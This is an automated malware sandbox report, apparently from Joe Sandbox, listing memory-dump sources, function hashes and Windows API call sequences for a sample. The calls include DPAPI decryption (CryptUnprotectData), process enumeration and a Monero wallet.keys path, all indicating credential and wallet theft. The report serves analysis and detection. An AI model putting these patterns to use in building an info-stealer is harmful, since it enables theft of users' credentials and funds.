                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: d2772ea55193eccfe1b45d74d905ed9ac0f88b08a929f696addbcd0a4ccaa0d0
                                • Instruction ID: 316ae44d55492ad85edfd63cca0b24125a06cdcff4b5a9e42e3af4405d3b5fee
                                • Opcode Fuzzy Hash: d2772ea55193eccfe1b45d74d905ed9ac0f88b08a929f696addbcd0a4ccaa0d0
                                • Instruction Fuzzy Hash: 9E12F9719101189BDB18FBA8EC96FED7338FB54304F4041ADA51AD6191EE34AF49CBA3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 56oj$6w~$@kf$YpSv$^Qil$DN;
                                • API String ID: 0-1169578544
                                • Opcode ID: 699820d881272ff4b7951ccbcbfb1c90636b3942dd3719a720232ba62dc22a13
                                • Instruction ID: 12c8ad73be689ebdc9f88b0327a10cc04db439ac55a8e91139aa35219ee98738
                                • Opcode Fuzzy Hash: 699820d881272ff4b7951ccbcbfb1c90636b3942dd3719a720232ba62dc22a13
                                • Instruction Fuzzy Hash: 27B226F3A0C214AFE3046E2DEC8567AFBE9EF94720F16463DEAC487740E63558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 6??$FfW$^kNo$n`$rj}7
                                • API String ID: 0-409958692
                                • Opcode ID: 8ed60468f38c7d4fb59efb558dfd7730278258a113a88b6f9b10752c28ed5f1b
                                • Instruction ID: 602c152f51996f89e477f3b7b2d0dbaf12cba56d50c725540d165743444a9cf4
                                • Opcode Fuzzy Hash: 8ed60468f38c7d4fb59efb558dfd7730278258a113a88b6f9b10752c28ed5f1b
                                • Instruction Fuzzy Hash: 77B2E6F360C200AFE304AE2DEC8567ABBE5EF94720F16893DE6C5C7744EA3558418697
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008BC871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008BC87C
                                • lstrcat.KERNEL32(?,008D0B46), ref: 008BC943
                                • lstrcat.KERNEL32(?,008D0B47), ref: 008BC957
                                • lstrcat.KERNEL32(?,008D0B4E), ref: 008BC978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: cf03d097945cddb3f2a1642a7ff878e5b0d4ec8de8cdf7b30f556416c93b0221
                                • Instruction ID: 372564b15d1ce4b4753a87e0a3ac54141b9ca0c66b88ff9e050b7ef9f1bfd5e3
                                • Opcode Fuzzy Hash: cf03d097945cddb3f2a1642a7ff878e5b0d4ec8de8cdf7b30f556416c93b0221
                                • Instruction Fuzzy Hash: 5E417FB590420ADBDB10DFD0DC89BFEBBB8FB48344F1041A9E509E6280D7749A85CF91
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008B724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008B7254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008B7281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008B72A4
                                • LocalFree.KERNEL32(?), ref: 008B72AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: e783d18e736d452521b1299011083be2fa94abc4500b34f02fbf966fe6325cae
                                • Instruction ID: 79947a37435cc3e134e14416cf02448838aa4c65f3c333e3d3f948d5f1ccb50b
                                • Opcode Fuzzy Hash: e783d18e736d452521b1299011083be2fa94abc4500b34f02fbf966fe6325cae
                                • Instruction Fuzzy Hash: 1D01EDB5A40208BBDB14DBE4CD45FAD7778EB44704F104155FB09EB2C0D6B0AA01CBA5
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008C961E
                                • Process32First.KERNEL32(008D0ACA,00000128), ref: 008C9632
                                • Process32Next.KERNEL32(008D0ACA,00000128), ref: 008C9647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 008C965C
                                • CloseHandle.KERNEL32(008D0ACA), ref: 008C967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 5bbf89e7a5efc50df0ff5b49001e88c737947bca57a243ba67e42150c26d87a7
                                • Instruction ID: 100c5dd0ada3259c7466744bf21396aa52e7d2bcc9363defda69754cea0e7acc
                                • Opcode Fuzzy Hash: 5bbf89e7a5efc50df0ff5b49001e88c737947bca57a243ba67e42150c26d87a7
                                • Instruction Fuzzy Hash: 3101E9B5A00208ABCB14DFE5CD48FEDB7F8FB58740F104188E94AD6280D774AA41CF91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @)L$GQ{}$O!]/$S$'s
                                • API String ID: 0-1136137448
                                • Opcode ID: 6dc9c4045fcf144466bf323bae03aa2f7d36f5414ab08782c5ce6a9b51eeb9c6
                                • Instruction ID: 86f9df0db7eb17679dfa90c25543c5752e22830e9979992df4c81be857265e8d
                                • Opcode Fuzzy Hash: 6dc9c4045fcf144466bf323bae03aa2f7d36f5414ab08782c5ce6a9b51eeb9c6
                                • Instruction Fuzzy Hash: D8B2F5F3A0C2149FE304AE2DDC8566AFBE5EF94720F168A3DE6C4C3744EA3558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 7|c$Dx$nFEg$qM/:
                                • API String ID: 0-4089904391
                                • Opcode ID: c5d8afbde7f3787e15ca90bf22e2afcfd8baa07c2dafe2997e22ef110766d419
                                • Instruction ID: 037ac16318a6bfb3c3e8f5267c933ab73131a1e69cb2ed733ba57cc2640edc2d
                                • Opcode Fuzzy Hash: c5d8afbde7f3787e15ca90bf22e2afcfd8baa07c2dafe2997e22ef110766d419
                                • Instruction Fuzzy Hash: 11B204F39082049FE304AE2DDC8567ABBE5EF94720F1A893DEAC5C3744EA3558058797
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *:z6$1O$:[~$=xY
                                • API String ID: 0-290968451
                                • Opcode ID: 563b42d176fdbc41c5e949215644c3e02ba4873eab68e4184be4311092f0685f
                                • Instruction ID: 172f681afa8c94b85250e6f95e7139ffd78aa5c8e57e2c229a0f207f1a033a1b
                                • Opcode Fuzzy Hash: 563b42d176fdbc41c5e949215644c3e02ba4873eab68e4184be4311092f0685f
                                • Instruction Fuzzy Hash: 2DA205F390C2049FD3046E29EC8566AF7E5EF94720F1A893DEAC487744EA3598058797
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008D05B7), ref: 008C86CA
                                • Process32First.KERNEL32(?,00000128), ref: 008C86DE
                                • Process32Next.KERNEL32(?,00000128), ref: 008C86F3
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • CloseHandle.KERNEL32(?), ref: 008C8761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 3949afecd9351d26a82611da4b16d771cdace475595d98839df70bb0957b5cd7
                                • Instruction ID: 74d8782d8f804323ea751db1787970c03b9857973b2c4f1a16c413e32bd78263
                                • Opcode Fuzzy Hash: 3949afecd9351d26a82611da4b16d771cdace475595d98839df70bb0957b5cd7
                                • Instruction Fuzzy Hash: 43312C71901218EBCB28EB94DC45FEEB778FB55704F1041ADA50AE6290DB34AA45CFA2
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,008B5184,40000001,00000000,00000000,?,008B5184), ref: 008C8EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 5ab00f4dbad43be1e6040bb1086522cfca86164d1a0602a61d43db772154f419
                                • Instruction ID: e08b82bb9c6121a7915961325abf053536a1c480ee38906ac91e08b0e9883a22
                                • Opcode Fuzzy Hash: 5ab00f4dbad43be1e6040bb1086522cfca86164d1a0602a61d43db772154f419
                                • Instruction Fuzzy Hash: 7511DFB0250208EBDB00CFA4E884FAA37B9FB89314F109458F919CB250DB75E842DB60
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008B4EEE,00000000,00000000), ref: 008B9AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,008B4EEE,00000000,?), ref: 008B9B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008B4EEE,00000000,00000000), ref: 008B9B2A
                                • LocalFree.KERNEL32(?,?,?,?,008B4EEE,00000000,?), ref: 008B9B3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 199ca6c94a1bc334dd0b975370bf8c525877568ce283042ad4b05667d162b09d
